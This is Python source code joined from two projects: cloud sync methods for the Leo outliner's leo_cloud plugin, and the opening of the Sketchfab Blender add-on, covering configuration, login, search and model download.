def _find_clouds_recursive(self, v, found):
"""see find_clouds()"""
if v.h.startswith('@ignore'):
return
if v.h.startswith('@leo_cloud'):
found.add(v)
return
else:
for child in v.children:
self._find_clouds_recursive(child, found)
def find_clouds(self):
"""find_clouds - return a list of @leo_cloud nodes
respects @ignore in headlines, doesn't recurse into @leo_cloud nodes
"""
found = set()
self._find_clouds_recursive(self.c.hiddenRootNode, found)
valid = []
for lc in found:
if 'ID' in self.kw_from_node(lc):
valid.append(lc)
else:
g.es('%s - no ID: line' % lc.h, color='red')
return valid
def _from_dict_recursive(self, top, d):
"""see from_dict()"""
top.h = d['h']
top.b = d['b']
top.u = d['u']
top.children[:] = []
for child in d['children']:
top.children.append(self._from_dict_recursive(vnode(self.c), child))
return top
def from_dict(self, d):
"""from_dict - make a Leo subtree from a dict
:param dict d: input dict
:return: vnode
"""
return self._from_dict_recursive(vnode(self.c), d)
def io_from_node(self, p):
"""io_from_node - create LeoCloudIO instance from body text
:param position p: node containing text
:return: LeoCloudIO instance
"""
kwargs = self.kw_from_node(p)
# pylint: disable=eval-used
lc_io_class = eval("LeoCloudIO%s" % kwargs['type'])
return lc_io_class(self.c, p, kwargs)
def kw_from_node(self, p):
"""kw_from_node - read keywords from body text
:param position p: node containing text
:return: dict
"""
kwargs = {}
for line in p.b.split('\n'):
kwarg = KWARG_RE.match(line)
if kwarg:
kwargs[kwarg.group(1)] = kwarg.group(2)
return kwargs
def load_clouds(self, from_background=None):
"""
load_clouds - Handle loading from cloud on startup and after
background checking for changes.
:param set from_background: set of (remote, ID) str tuples if we're
called after a background check process finds changes.
"""
if from_background is None:
from_background = set()
skipped = []
background = [] # things to check in background
for lc_v in self.find_clouds():
kwargs = self.kw_from_node(lc_v)
if from_background and \
(kwargs['remote'], kwargs['ID']) not in from_background:
# only process nodes from the background checking
continue
read = False
read_on_load = kwargs.get('read_on_load', '').lower()
if from_background:
# was 'background', changes found, so now treat as 'ask'
read_on_load = 'ask'
if read_on_load == 'yes':
read = True
elif read_on_load == 'ask':
try:
last_read = datetime.strptime(
lc_v.u['_leo_cloud']['last_read'], "%Y-%m-%dT%H:%M:%S.%f")
except KeyError:
last_read = None
message = "Read cloud data '%s', overwriting local nodes?" % kwargs['ID']
if last_read:
delta = datetime.now() - last_read
message = "%s\n%s, %sh:%sm:%ss ago" % (
message, last_read.strftime("%a %b %d %H:%M"),
24*delta.days+int(delta.seconds / 3600),
int(delta.seconds / 60) % 60,
delta.seconds % 60)
read = g.app.gui.runAskYesNoCancelDialog(self.c, "Read cloud data?",
message=message)
read = str(read).lower() == 'yes'
if read:
self.read_current(p=self.c.vnode2position(lc_v))
elif read_on_load == 'background':
# second time round, with from_background data, this will
# have been changed to 'ask' (above), so no infinite loop
background.append((lc_v, kwargs,
self.recursive_hash(lc_v, [], include_current=False)))
elif read_on_load == 'no':
g.es("NOTE: not reading '%s' from cloud" % kwargs['ID'])
elif read_on_load != 'ask':
skipped.append(kwargs['ID'])
if skipped:
g.app.gui.runAskOkDialog(self.c, "Unloaded cloud data",
message="There is unloaded (possibly stale) cloud data, use\nread_on_load: yes|no|ask\n"
"in @leo_cloud nodes to avoid this message.\nUnloaded data:\n%s" % ', '.join(skipped))
if background:
# send to background thread for checking
names = ', '.join([i[1]['ID'] for i in background])
g.es("Checking cloud trees in background:\n%s" % names)
thread = threading.Thread(target=self.bg_check, args=(background,))
thread.start()
# start watching for results
g.IdleTime(self.bg_post_process).start()
def read_current(self, p=None):
"""read_current - read current tree from cloud
"""
if p is None:
p = self.find_at_leo_cloud(self.c.p)
if not p:
return
old_p = self.c.p.copy()
g.es("Reading from cloud...") # some IOs are slow to init. - reassure user
# io's can cache themselves on the vnode, but should think hard
# about whether they want to
lc_io = getattr(p.v, '_leo_cloud_io', None) or self.io_from_node(p)
v = lc_io.get_subtree(lc_io.lc_id)
p.deleteAllChildren()
for child_n, child in enumerate(v.children):
child._addLink(child_n, p.v)
if hasattr(self.c, 'cleo'):
self.c.cleo.loadAllIcons()
self.c.redraw(p=old_p if self.c.positionExists(old_p) else p)
g.es("Read %s" % lc_io.lc_id)
# set c changed but don't dirty tree, which would cause
# write to cloud prompt on save
self.c.setChanged(changedFlag=True)
p.v.u.setdefault('_leo_cloud', {})['last_read'] = datetime.now().isoformat()
@staticmethod
def recursive_hash(nd, tree, include_current=True):
"""
recursive_hash - recursively hash a tree
Note - used by bg_check() / load_clouds() to detect changes in cloud trees
:param vnode nd: node to hash
:param list tree: recursive list of hashes
:param bool include_current: include h/b/u of current node in hash?
:return: sha1 hash of tree
:rtype: str
Calling with include_current=False ignores the h/b/u of the top node.
To hash a dict, we need a string representation
that sorts keys, i.e. json.dumps(s, sort_keys=True)
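Usage sketch (mirrors bg_check() / load_clouds() above), comparing a local
tree with its cloud copy while ignoring the @leo_cloud node itself:
    local  = LeoCloud.recursive_hash(lc_v, [], include_current=False)
    remote = LeoCloud.recursive_hash(lc_io.get_subtree(lc_io.lc_id), [],
                                     include_current=False)
    unchanged = (local == remote)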
"""
childs = []
hashes = [LeoCloud.recursive_hash(child, childs) for child in nd.children]
if include_current:
hashes.extend([nd.h + nd.b + json.dumps(LeoCloud._ua_clean(nd.u), sort_keys=True)])
whole_hash = sha1(''.join(hashes).encode('utf-8')).hexdigest()
tree.append([whole_hash, childs])
return whole_hash
def save_clouds(self):
"""check for clouds to save when outline is saved"""
skipped = []
no = []
unchanged = []
for lc_v in self.find_clouds():
kwargs = self.kw_from_node(lc_v)
write = False
write_on_save = kwargs.get('write_on_save', '').lower()
if not self.subtree_changed(lc_v):
write_on_save = 'unchanged'
if write_on_save == 'yes':
write = True
elif write_on_save == 'ask':
write = g.app.gui.runAskYesNoCancelDialog(self.c, "Write cloud data?",
message="Write cloud data '%s', overwriting remote version?" % kwargs['ID'])
write = str(write).lower() == 'yes'
if write:
self.write_current(p=self.c.vnode2position(lc_v))
elif write_on_save == 'no':
no.append(kwargs['ID'])
elif write_on_save == 'unchanged':
unchanged.append(kwargs['ID'])
elif write_on_save != 'ask':
skipped.append(kwargs['ID'])
if skipped:
g.app.gui.runAskOkDialog(self.c, "Unsaved cloud data",
message="There is unsaved cloud data, use\nwrite_on_save: yes|no|ask\n"
"in @leo_cloud nodes to avoid this message.\nUnsaved data:\n%s" % ', '.join(skipped))
if unchanged:
g.es("Unchanged cloud data: %s" % ', '.join(unchanged))
if no:
g.es("Cloud data never saved: %s" % ', '.join(no))
def subtree_changed(self, p):
"""subtree_changed - check if subtree is changed
:param position p: top of subtree
:return: bool
"""
if isinstance(p, vnode):
p = self.c.vnode2position(p)
for nd in p.self_and_subtree_iter():
if nd.isDirty():
break
else:
return False
return True
@staticmethod
def _to_json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, set):
return list(obj)
raise TypeError ("Type %s not serializable" % type(obj))
@staticmethod
def to_json(data):
"""to_json - convert dict to appropriate JSON
:param dict data: data to convert
:return: json
:rtype: str
"""
return json.dumps(
data,
sort_keys=True, # prevent unnecessary diffs
indent=0, # make json readable on cloud web pages
default=LeoCloud._to_json_serial
)
@staticmethod
def _to_dict_recursive(v, d):
"""_to_dict_recursive - recursively make dictionary representation of v
:param vnode v: subtree to convert
:param dict d: dict for results
:return: dict of subtree
"""
d['b'] = v.b
d['h'] = v.h
d['u'] = v.u
d['children'] = []
for child in v.children:
d['children'].append(LeoCloud._to_dict_recursive(child, dict()))
return d
@staticmethod
def to_dict(v):
"""to_dict - make dictionary representation of v
:param vnode v: subtree to convert
:return: dict of subtree
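The resulting shape (a sketch, derived from _to_dict_recursive() above) is:
    {'h': headline, 'b': body, 'u': uA dict, 'children': [<same shape>, ...]}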
"""
return LeoCloud._to_dict_recursive(v, dict())
@staticmethod
def _ua_clean(d):
"""_ua_clean - strip todo icons from dict
:param dict d: dict to clean
:return: cleaned dict
recursive_hash() to compare trees stumbles on todo icons which are
derived information from the todo attribute and include *local*
paths to icon images
"""
d = deepcopy(d)
if 'icons' in d:
d['icons'] = [i for i in d['icons'] if not i.get('cleoIcon')]
return d
def write_current(self, p=None):
"""write_current - write current tree to cloud
"""
if p is None:
p = self.find_at_leo_cloud(self.c.p)
if not p:
return
g.es("Storing to cloud...") # some IOs are slow to init. - reassure user
lc_io = getattr(p.v, '_leo_cloud_io', None) or self.io_from_node(p)
lc_io.put_subtree(lc_io.lc_id, p.v)
g.es("Stored %s" % lc_io.lc_id)
# writing counts as reading, last read time msg. confusing otherwise
p.v.u.setdefault('_leo_cloud', {})['last_read'] = datetime.now().isoformat()
|
__init__.py
|
"""
Copyright 2022 Sketchfab
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import urllib
import requests
import threading
import time
from collections import OrderedDict
import subprocess
import tempfile
import json
import shutil
from uuid import UUID
import bpy
import bpy.utils.previews
from bpy.props import (StringProperty,
EnumProperty,
BoolProperty,
IntProperty,
PointerProperty)
from .io import *
from .io.imp.gltf2_io_gltf import *
from .blender.imp.gltf2_blender_gltf import *
from .blender.blender_version import Version
# Blender 2.79 shipped with OpenSSL 0.9.8, which uses a TLS protocol
# that is now blocked for security reasons on websites (github.com for example).
# In order to allow communication with github.com and other websites, the code will attempt
# to use the updated OpenSSL version distributed with the addon.
# Note: Blender 2.8 ships with a more recent OpenSSL version. This fix is only for 2.79 and older
if bpy.app.version < (2, 80, 0) and not bpy.app.build_platform == b'Windows':
try:
sslib_path = None
if bpy.app.build_platform == b'Darwin':
sslib_path = os.path.join(os.path.dirname(__file__), 'dependencies/_ssl.cpython-35m-darwin.so')
elif bpy.app.build_platform == b'Linux':
sslib_path = os.path.join(os.path.dirname(__file__), '/io_sketchfab_plugin/_ssl.cpython-35m-x86_64-linux-gnu.so')
import importlib.util
spec = importlib.util.spec_from_file_location("_ssl", sslib_path)
new_ssl = importlib.util.module_from_spec(spec)
spec.loader.exec_module(new_ssl)
from importlib import reload
import ssl
reload(ssl)
from requests.packages.urllib3.util import ssl_
reload(ssl_)
print('SSL python module has been successfully overridden by Sketchfab addon')
print('It might fix other addons having the same refused TLS protocol issue')
except Exception as e:
print(e)
print("Failed to override SSL lib. The plugin will not be able to check for updates")
bl_info = {
'name': 'Sketchfab Plugin',
'description': 'Browse and download free Sketchfab downloadable models',
'author': 'Sketchfab',
'license': 'APACHE2',
'deps': '',
'version': (1, 5, 0),
"blender": (2, 80, 0),
'location': 'View3D > Tools > Sketchfab',
'warning': '',
'wiki_url': 'https://github.com/sketchfab/blender-plugin/releases',
'tracker_url': 'https://github.com/sketchfab/blender-plugin/issues',
'link': 'https://github.com/sketchfab/blender-plugin',
'support': 'COMMUNITY',
'category': 'Import-Export'
}
bl_info['blender'] = getattr(bpy.app, "version")
PLUGIN_VERSION = str(bl_info['version']).strip('() ').replace(',', '.')
preview_collection = {}
thumbnailsProgress = set([])
ongoingSearches = set([])
is_plugin_enabled = False
class Config:
ADDON_NAME = 'io_sketchfab'
GITHUB_REPOSITORY_URL = 'https://github.com/sketchfab/blender-plugin'
GITHUB_REPOSITORY_API_URL = 'https://api.github.com/repos/sketchfab/blender-plugin'
SKETCHFAB_REPORT_URL = 'https://help.sketchfab.com/hc/en-us/requests/new?type=exporters&subject=Blender+Plugin'
SKETCHFAB_URL = 'https://sketchfab.com'
DUMMY_CLIENTID = 'hGC7unF4BHyEB0s7Orz5E1mBd3LluEG0ILBiZvF9'
SKETCHFAB_OAUTH = SKETCHFAB_URL + '/oauth2/token/?grant_type=password&client_id=' + DUMMY_CLIENTID
SKETCHFAB_API = 'https://api.sketchfab.com'
SKETCHFAB_SEARCH = SKETCHFAB_API + '/v3/search'
SKETCHFAB_MODEL = SKETCHFAB_API + '/v3/models'
SKETCHFAB_ORGS = SKETCHFAB_API + '/v3/orgs'
SKETCHFAB_SIGNUP = 'https://sketchfab.com/signup'
BASE_SEARCH = SKETCHFAB_SEARCH + '?type=models&downloadable=true'
DEFAULT_FLAGS = '&staffpicked=true&sort_by=-staffpickedAt'
DEFAULT_SEARCH = SKETCHFAB_SEARCH + \
'?type=models&downloadable=true' + DEFAULT_FLAGS
SKETCHFAB_ME = '{}/v3/me'.format(SKETCHFAB_API)
BASE_SEARCH_OWN_MODELS = SKETCHFAB_ME + '/search?type=models&downloadable=true'
PURCHASED_MODELS = SKETCHFAB_ME + "/models/purchases?type=models"
SKETCHFAB_PLUGIN_VERSION = '{}/releases'.format(GITHUB_REPOSITORY_API_URL)
# Those will be set during plugin initialization, or upon setting a new cache directory
SKETCHFAB_TEMP_DIR = ""
SKETCHFAB_THUMB_DIR = ""
SKETCHFAB_MODEL_DIR = ""
SKETCHFAB_CATEGORIES = (('ALL', 'All categories', 'All categories'),
('animals-pets', 'Animals & Pets', 'Animals and Pets'),
('architecture', 'Architecture', 'Architecture'),
('art-abstract', 'Art & Abstract', 'Art & Abstract'),
('cars-vehicles', 'Cars & vehicles', 'Cars & vehicles'),
('characters-creatures', 'Characters & Creatures', 'Characters & Creatures'),
('cultural-heritage-history', 'Cultural Heritage & History', 'Cultural Heritage & History'),
('electronics-gadgets', 'Electronics & Gadgets', 'Electronics & Gadgets'),
('fashion-style', 'Fashion & Style', 'Fashion & Style'),
('food-drink', 'Food & Drink', 'Food & Drink'),
('furniture-home', 'Furniture & Home', 'Furniture & Home'),
('music', 'Music', 'Music'),
('nature-plants', 'Nature & Plants', 'Nature & Plants'),
('news-politics', 'News & Politics', 'News & Politics'),
('people', 'People', 'People'),
('places-travel', 'Places & Travel', 'Places & Travel'),
('science-technology', 'Science & Technology', 'Science & Technology'),
('sports-fitness', 'Sports & Fitness', 'Sports & Fitness'),
('weapons-military', 'Weapons & Military', 'Weapons & Military'))
SKETCHFAB_FACECOUNT = (('ANY', "All", ""),
('10K', "Up to 10k", ""),
('50K', "10k to 50k", ""),
('100K', "50k to 100k", ""),
('250K', "100k to 250k", ""),
('250KP', "250k +", ""))
SKETCHFAB_SORT_BY = (('RELEVANCE', "Relevance", ""),
('LIKES', "Likes", ""),
('VIEWS', "Views", ""),
('RECENT', "Recent", ""))
SKETCHFAB_SEARCH_DOMAIN = (('DEFAULT', "All site", "", 0),
('OWN', "Own Models (PRO)", "", 1),
('STORE', "Store purchases", "", 2))
MAX_THUMBNAIL_HEIGHT = 256
SKETCHFAB_UPLOAD_LIMITS = {
"basic" : 100 * 1024 * 1024,
"plus": 100 * 1024 * 1024,
"pro": 200 * 1024 * 1024,
"prem": 200 * 1024 * 1024,
"biz": 500 * 1024 * 1024,
"ent": 500 * 1024 * 1024
}
class Utils:
def humanify_size(size):
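# Illustrative values (worked examples, not from the original source):
#   Utils.humanify_size(512)         -> '512B'
#   Utils.humanify_size(2048)        -> '2.0KB'
#   Utils.humanify_size(3 * 1048576) -> '3.0MB'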
suffix = 'B'
readable = size
# Megabyte
if size > 1048576:
suffix = 'MB'
readable = size / 1048576.0
# Kilobyte
elif size > 1024:
suffix = 'KB'
readable = size / 1024.0
readable = round(readable, 2)
return '{}{}'.format(readable, suffix)
def humanify_number(number):
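# Illustrative values (worked examples, not from the original source):
#   Utils.humanify_number(950)     -> '950'
#   Utils.humanify_number(1500)    -> '1.5K'
#   Utils.humanify_number(2500000) -> '2.5M'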
suffix = ''
readable = number
if number > 1000000:
suffix = 'M'
readable = number / 1000000.0
elif number > 1000:
suffix = 'K'
readable = number / 1000.0
readable = round(readable, 2)
return '{}{}'.format(readable, suffix)
def build_download_url(uid, use_org_profile=False, active_org=None):
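# e.g. (illustrative; '<uid>' and '<org uid>' are placeholders):
#   Utils.build_download_url('<uid>')
#     -> 'https://api.sketchfab.com/v3/models/<uid>/download'
#   Utils.build_download_url('<uid>', True, {'uid': '<org uid>'})
#     -> 'https://api.sketchfab.com/v3/orgs/<org uid>/models/<uid>/download'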
if use_org_profile:
return '{}/{}/models/{}/download'.format(Config.SKETCHFAB_ORGS, active_org["uid"], uid)
else:
return '{}/{}/download'.format(Config.SKETCHFAB_MODEL, uid)
def thumbnail_file_exists(uid):
return os.path.exists(os.path.join(Config.SKETCHFAB_THUMB_DIR, '{}.jpeg'.format(uid)))
def clean_thumbnail_directory():
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
return
from os import listdir
for file in listdir(Config.SKETCHFAB_THUMB_DIR):
os.remove(os.path.join(Config.SKETCHFAB_THUMB_DIR, file))
def clean_downloaded_model_dir(uid):
shutil.rmtree(os.path.join(Config.SKETCHFAB_MODEL_DIR, uid))
def get_thumbnail_url(thumbnails_json):
min_height = 1e6
min_thumbnail = None
best_height = 0
best_thumbnail = None
for image in thumbnails_json['images']:
h = image['height']
if h <= Config.MAX_THUMBNAIL_HEIGHT and h > best_height:
best_height = h
best_thumbnail = image['url']
elif h < min_height:
min_height = h
min_thumbnail = image['url']
# Ensure we have a thumbnail if available thumbnails are all above MAX_THUMBNAIL_HEIGHT
if best_thumbnail is None and min_thumbnail is not None:
return min_thumbnail
return best_thumbnail
def make_model_name(gltf_data):
if 'title' in gltf_data.asset.extras:
return gltf_data.asset.extras['title']
return 'GLTFModel'
def setup_plugin():
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
os.makedirs(Config.SKETCHFAB_THUMB_DIR)
def get_uid_from_thumbnail_url(thumbnail_url):
return thumbnail_url.split('/')[4]
def get_uid_from_model_url(model_url, use_org_profile=False):
try:
return model_url.split('/')[7] if use_org_profile else model_url.split('/')[5]
except:
ShowMessage("ERROR", "Url parsing error", "Error getting uid from url: {}".format(model_url))
return None
def get_uid_from_download_url(model_url):
return model_url.split('/')[6]
def clean_node_hierarchy(objects, root_name):
"""
Removes the useless nodes in a hierarchy
TODO: Keep the transform (might impact Yup/Zup)
"""
# Find the parent object
root = None
for object in objects:
if object.parent is None:
root = object
if root is None:
return None
# Go down its hierarchy until one child has multiple children, or a single mesh
# Keep the name while deleting objects in the hierarchy
diverges = False
while diverges==False:
children = root.children
if children is not None:
if len(children)>1:
diverges = True
root.name = root_name
if len(children)==1:
if children[0].type != "EMPTY":
diverges = True
root.name = root_name
if children[0].type == "MESH": # should always be the case
matrixcopy = children[0].matrix_world.copy()
children[0].parent = None
children[0].matrix_world = matrixcopy
bpy.data.objects.remove(root)
children[0].name = root_name
root = children[0]
elif children[0].type == "EMPTY":
diverges = False
matrixcopy = children[0].matrix_world.copy()
children[0].parent = None
children[0].matrix_world = matrixcopy
bpy.data.objects.remove(root)
root = children[0]
else:
break
# Select the root Empty node
root.select_set(True)
def is_valid_uuid(uuid_to_test, version=4):
try:
uuid_obj = UUID(hex=uuid_to_test, version=version)
return True
except ValueError:
return False
class Cache:
SKETCHFAB_CACHE_FILE = os.path.join(
bpy.utils.user_resource("SCRIPTS", path="sketchfab_cache", create=True),
".cache"
) # Use a user path to avoid permission-related errors
def read():
if not os.path.exists(Cache.SKETCHFAB_CACHE_FILE):
return {}
with open(Cache.SKETCHFAB_CACHE_FILE, 'rb') as f:
data = f.read().decode('utf-8')
return json.loads(data)
def get_key(key):
cache_data = Cache.read()
if key in cache_data:
return cache_data[key]
def save_key(key, value):
cache_data = Cache.read()
cache_data[key] = value
with open(Cache.SKETCHFAB_CACHE_FILE, 'wb+') as f:
f.write(json.dumps(cache_data).encode('utf-8'))
def delete_key(key):
cache_data = Cache.read()
if key in cache_data:
del cache_data[key]
with open(Cache.SKETCHFAB_CACHE_FILE, 'wb+') as f:
f.write(json.dumps(cache_data).encode('utf-8'))
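# Usage sketch (names as defined above): the plugin keeps small key/value pairs
# such as tokens in a JSON file, e.g.
#   Cache.save_key('api_token', token)
#   Cache.get_key('api_token')    # -> token, or None if missing
#   Cache.delete_key('api_token')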
# helpers
def get_sketchfab_login_props():
return bpy.context.window_manager.sketchfab_api
def get_sketchfab_props():
return bpy.context.window_manager.sketchfab_browser
def get_sketchfab_props_proxy():
return bpy.context.window_manager.sketchfab_browser_proxy
def get_sketchfab_model(uid):
skfb = get_sketchfab_props()
if "current" in skfb.search_results and uid in skfb.search_results["current"]:
return skfb.search_results['current'][uid]
else:
return None
def run_default_search():
searchthr = GetRequestThread(Config.DEFAULT_SEARCH, parse_results)
searchthr.start()
def get_plugin_enabled():
global is_plugin_enabled
return is_plugin_enabled
def refresh_search(self, context):
pprops = get_sketchfab_props_proxy()
if pprops.is_refreshing:
return
props = get_sketchfab_props()
if pprops.search_domain != props.search_domain:
props.search_domain = pprops.search_domain
if pprops.sort_by != props.sort_by:
props.sort_by = pprops.sort_by
if 'current' in props.search_results:
del props.search_results['current']
props.query = pprops.query
props.animated = pprops.animated
props.pbr = pprops.pbr
props.staffpick = pprops.staffpick
props.categories = pprops.categories
props.face_count = pprops.face_count
bpy.ops.wm.sketchfab_search('EXEC_DEFAULT')
def set_login_status(status_type, status):
login_props = get_sketchfab_login_props()
login_props.status = status
login_props.status_type = status_type
def set_import_status(status):
props = get_sketchfab_props()
props.import_status = status
class SketchfabApi:
def __init__(self):
self.access_token = ''
self.api_token = ''
self.headers = {}
self.username = ''
self.display_name = ''
self.plan_type = ''
self.next_results_url = None
self.prev_results_url = None
self.user_orgs = []
self.active_org = None
self.use_org_profile = False
def build_headers(self):
if self.access_token:
self.headers = {'Authorization': 'Bearer ' + self.access_token}
elif self.api_token:
self.headers = {'Authorization': 'Token ' + self.api_token}
else:
print("Empty authorization header")
self.headers = {}
def login(self, email, password, api_token):
bpy.ops.wm.login_modal('INVOKE_DEFAULT')
def is_user_logged(self):
if (self.access_token or self.api_token) and self.headers:
return True
return False
def is_user_pro(self):
return len(self.plan_type) and self.plan_type not in ['basic', 'plus']
def logout(self):
self.access_token = ''
self.api_token = ''
self.headers = {}
Cache.delete_key('username')
Cache.delete_key('access_token')
Cache.delete_key('api_token')
Cache.delete_key('key')
props = get_sketchfab_props()
#props.search_domain = "DEFAULT"
if 'current' in props.search_results:
del props.search_results['current']
pprops = get_sketchfab_props_proxy()
#pprops.search_domain = "DEFAULT"
self.user_orgs = []
self.active_org = None
self.use_org_profile = False
props.use_org_profile = False
pprops.use_org_profile = False
bpy.ops.wm.sketchfab_search('EXEC_DEFAULT')
def request_user_info(self):
requests.get(Config.SKETCHFAB_ME, headers=self.headers, hooks={'response': self.parse_user_info})
def get_user_info(self):
if self.display_name and self.plan_type:
return '{} ({})'.format(self.display_name, self.plan_type)
else:
return ('', '')
def parse_user_info(self, r, *args, **kargs):
if r.status_code == 200:
user_data = r.json()
self.username = user_data['username']
self.display_name = user_data['displayName']
self.plan_type = user_data['account']
requests.get(Config.SKETCHFAB_ME + "/orgs", headers=self.headers, hooks={'response': self.parse_orgs_info})
else:
print('\nInvalid access or API token\nYou can get your API token here:\nhttps://sketchfab.com/settings/password\n')
set_login_status('ERROR', 'Failed to authenticate')
ShowMessage("ERROR", "Failed to authenticate", "Invalid access or API token")
self.access_token = ''
self.api_token = ''
self.headers = {}
def parse_orgs_info(self, r, *args, **kargs):
"""
Get and store information about user's orgs, and its orgs projects
"""
if r.status_code == 200:
orgs_data = r.json()
# Get a list of the user's orgs
for org in orgs_data["results"]:
self.user_orgs.append({
"uid": org["uid"],
"displayName": org["displayName"],
"username": org["username"],
"url": org["publicProfileUrl"],
"projects": [],
})
self.user_orgs.sort(key = lambda x : x["displayName"])
# Iterate on the orgs to get lists of their projects
for org in self.user_orgs:
# Create the callback inline to keep a reference to the org uid
def parse_projects_info(r, *args, **kargs):
"""
Get and store information about an org projects
"""
if r.status_code == 200:
projects_data = r.json()
projects = projects_data["results"]
# Add the projects to the orgs dict object
for proj in projects:
org_uid = proj["org"]["uid"]
org = next((x for x in self.user_orgs if x["uid"] == org_uid))
org["projects"].append({
"uid": proj["uid"],
"name": proj["name"],
"slug": proj["slug"],
"modelCount": proj["modelCount"],
"memberCount": proj["memberCount"],
})
org["projects"].sort(key = lambda x : x["name"])
# Iterate on all projects (not just the 24 first)
if projects_data["next"] is not None:
requests.get(
projects_data["next"],
headers=self.headers,
hooks={'response': parse_projects_info}
)
else:
print('Can not get projects info')
requests.get("%s/%s/projects" % (Config.SKETCHFAB_ORGS, org["uid"]),
headers=self.headers,
hooks={'response': parse_projects_info})
# Set the first org as active
if len(self.user_orgs):
self.active_org = self.user_orgs[0]
# Iterate on all orgs (not just the 24 first)
if orgs_data["next"] is not None:
requests.get(orgs_data["next"], headers=self.headers, hooks={'response': self.parse_orgs_info})
def request_thumbnail(self, thumbnails_json, model_uid):
# Avoid requesting the same data twice
if model_uid not in thumbnailsProgress:
thumbnailsProgress.add(model_uid)
url = Utils.get_thumbnail_url(thumbnails_json)
thread = ThumbnailCollector(url)
thread.start()
def request_model_info(self, uid, callback=None):
callback = self.handle_model_info if callback is None else callback
url = Config.SKETCHFAB_MODEL + '/' + uid
if self.use_org_profile and self.active_org.get("uid"):
url = Config.SKETCHFAB_ORGS + "/" + self.active_org["uid"] + "/models/" + uid
model_infothr = GetRequestThread(url, callback, self.headers)
model_infothr.start()
def handle_model_info(self, r, *args, **kwargs):
skfb = get_sketchfab_props()
uid = Utils.get_uid_from_model_url(r.url, self.use_org_profile)
# Dirty fix to avoid processing obsolete result data
if 'current' not in skfb.search_results or uid is None or uid not in skfb.search_results['current']:
return
model = skfb.search_results['current'][uid]
json_data = r.json()
model.license = json_data.get('license', {})
if model.license is not None:
model.license = model.license.get('fullName', 'Personal (you own this model)')
anim_count = int(json_data.get('animationCount', 0))
model.animated = 'Yes ({} animation(s))'.format(anim_count) if anim_count > 0 else 'No'
skfb.search_results['current'][uid] = model
def search(self, query, search_cb):
skfb = get_sketchfab_props()
url = Config.BASE_SEARCH
if skfb.search_domain == "OWN":
url = Config.BASE_SEARCH_OWN_MODELS
elif skfb.search_domain == "STORE":
url = Config.PURCHASED_MODELS
elif skfb.search_domain == "ACTIVE_ORG":
url = Config.SKETCHFAB_ORGS + "/%s/models?isArchivesReady=true" % self.active_org["uid"]
elif len(skfb.search_domain) == 32:
url = Config.SKETCHFAB_ORGS + "/%s/models?isArchivesReady=true&projects=%s" % (self.active_org["uid"], skfb.search_domain)
search_query = '{}{}'.format(url, query)
if search_query not in ongoingSearches:
ongoingSearches.add(search_query)
searchthr = GetRequestThread(search_query, search_cb, self.headers)
searchthr.start()
def search_cursor(self, url, search_cb):
requests.get(url, headers=self.headers, hooks={'response': search_cb})
def write_model_info(self, title, author, authorUrl, license, uid):
try:
downloadHistory = bpy.context.preferences.addons[__name__.split('.')[0]].preferences.downloadHistory
if downloadHistory != "":
downloadHistory = os.path.abspath(downloadHistory)
createFile = False
if not os.path.exists(downloadHistory):
createFile = True
with open(downloadHistory, 'a+') as f:
if createFile:
f.write("Model name, Author name, Author url, License, Model link,\n")
f.write("{}, {}, https://sketchfab.com/{}, {}, https://sketchfab.com/models/{},\n".format(
title.replace(",", " "),
author.replace(",", " "),
authorUrl.replace(",", " "),
license.replace(",", " "),
uid
))
except:
print("Error encountered while saving data to history file")
def parse_model_info_request(self, r, *args, **kargs):
try:
if r.status_code == 200:
result = r.json()
title = result['name']
author = result['user']['displayName']
username = result['user']['username']
license = result["license"]["label"]
uid = result['uid']
self.write_model_info(title, author, username, license, uid)
else:
print("Error encountered while getting model info ({})\n{}\n{}".format(r.status_code, r.url, str(r.json())))
except:
print("Error encountered while parsing model info request: {}".format(r.url))
def download_model(self, uid):
skfb_model = get_sketchfab_model(uid)
if skfb_model is not None: # The model comes from the search results
if skfb_model.download_url and (time.time() - skfb_model.time_url_requested < skfb_model.url_expires):
self.get_archive(skfb_model.download_url)
else:
skfb_model.download_url = None
skfb_model.url_expires = None
skfb_model.time_url_requested = None
self.write_model_info(skfb_model.title, skfb_model.author, skfb_model.username, skfb_model.license, uid)
requests.get(Utils.build_download_url(uid, self.use_org_profile, self.active_org), headers=self.headers, hooks={'response': self.handle_download})
else: # Model comes from a direct link
skfb = get_sketchfab_props()
download_url = ""
# If the model is in an org, find if the user has access to it
if "/orgs/" in skfb.manualImportPath:
try:
orgName = skfb.manualImportPath.split("/orgs/")[1].split("/")[0]
user_orgs = skfb.skfb_api.user_orgs
orgUid = ""
for org in user_orgs:
if org["username"] == orgName:
orgUid = org["uid"]
break
if orgUid:
download_url = '{}/{}/models/{}/download'.format(Config.SKETCHFAB_ORGS, orgUid, uid)
else:
ShowMessage("ERROR", "User not in Organization", "User does not appear to belong to org %s" % (orgName))
return
except:
ShowMessage("ERROR", "Invalid url", "Cannot parse org name from url %s" % skfb.manualImportPath)
return
# Otherwise, request a direct download and get model info
else:
download_url = Utils.build_download_url(uid)
requests.get('{}/{}'.format(Config.SKETCHFAB_MODEL, uid), headers=skfb.skfb_api.headers, hooks={'response': self.parse_model_info_request})
requests.get(download_url, headers=self.headers, hooks={'response': self.handle_download})
def handle_download(self, r, *args, **kwargs):
if r.status_code != 200 or 'gltf' not in r.json():
ShowMessage("ERROR", "This model is not downloadable", "Make sure your account has enough rights to download the model")
return
skfb = get_sketchfab_props()
uid = Utils.get_uid_from_model_url(r.url, self.use_org_profile)
if uid is None:
return
gltf = r.json()['gltf']
skfb_model = get_sketchfab_model(uid)
if skfb_model is not None:
skfb_model.download_url = gltf['url']
skfb_model.time_url_requested = time.time()
skfb_model.url_expires = gltf['expires']
self.get_archive(gltf['url'])
def get_archive(self, url):
if url is None:
print('Url is None')
return
r = requests.get(url, stream=True)
uid = Utils.get_uid_from_download_url(url)
temp_dir = os.path.join(Config.SKETCHFAB_MODEL_DIR, uid)
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
archive_path = os.path.join(temp_dir, '{}.zip'.format(uid))
